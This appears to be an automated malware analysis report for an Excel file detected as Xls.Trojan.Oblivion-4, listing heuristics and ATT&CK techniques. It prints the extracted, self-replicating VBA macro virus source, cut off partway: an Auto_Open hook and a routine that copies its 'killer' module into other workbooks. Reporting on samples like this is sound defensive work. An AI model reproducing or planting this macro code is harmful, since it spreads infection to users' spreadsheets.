MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical ClamAV detection and high-severity heuristic for an Auto_Open macro indicate malicious intent. The Auto_Open subroutine in the VBA script is designed to execute upon opening the Excel file, likely to perform further malicious actions. The script attempts to manipulate the workbook and potentially drop or execute other malicious files, as suggested by the presence of 'ACF.XLS' in the script logic.
Heuristics 3
-
ClamAV: Xls.Trojan.Oblivion-4 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Oblivion-4
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11336 bytes |
SHA-256: 66567ad58c15fcd46f2baa36ee64ff47d7b1b073dea9cbaa0555f59029e5283c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "killer"
Sub Auto_Open()
Application.OnSheetActivate = "kill"
End Sub
Sub KILL()
sStpath = Application.StartupPath
vname = Dir(sStpath & "\" & "ACF.XLS")
If UCase(vname) = "ACF.XLS" Then
p = 1
Else
p = 0
End If
If UCase(ActiveWorkbook.Name) = "ACF.XLS" Then
ActiveWindow.Visible = False
Else
Select Case p
Case 1
Application.ScreenUpdating = False
oldfname = ActiveWorkbook.Name
thisfname = ThisWorkbook.Name
NumOfCmp = ActiveWorkbook.VBProject.VBComponents.Count
For n = 1 To NumOfCmp
ntype = ActiveWorkbook.VBProject.VBComponents(n).Type
If ntype = 1 And ActiveWorkbook.VBProject.VBComponents(n).Name = "killer" Then
w = 1
Exit For
Else
If n = NumOfCmp Then
w = 0
ActiveWorkbook.VBProject.VBComponents.Add (1)
Set Acts1 = Workbooks(oldfname).VBProject.VBComponents(n + 1)
Set shashou = Workbooks(thisfname).VBProject.VBComponents("killer")
ssCl = shashou.CodeModule.CountofLines
For i = 1 To ssCl
Acts1.CodeModule.InsertLines i, shashou.CodeModule.Lines(i, 1)
Next i
Acts1.Name = "killer"
End If
End If
Next n
Application.ScreenUpdating = True
Case 0
Application.ScreenUpdating = False
thisfname = ThisWorkbook.Name
Workbooks.Add
With ActiveWorkbook
.Title = ""
.Subject = ""
.Author = ""
.Keywords = ""
.Comments = ""
End With
newfname = ActiveWorkbook.Name
NumOfCmp = ActiveWorkbook.VBProject.VBComponents.Count
For n = 1 To NumOfCmp
ntype = ActiveWorkbook.VBProject.VBComponents(n).Type
If ntype = 1 Then
w = 1
Exit For
Else
If n = NumOfCmp Then
w = 0
ActiveWorkbook.VBProject.VBComponents.Add (1)
End If
End If
Next n
Set Acts1 = Workbooks(newfname).VBProject.VBComponents(n)
Set shashou = Workbooks(thisfname).VBProject.VBComponents("killer")
ssCl = shashou.CodeModule.CountofLines
For i = 1 To ssCl
Acts1.CodeModule.InsertLines i, shashou.CodeModule.Lines(i, 1)
Next i
A
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.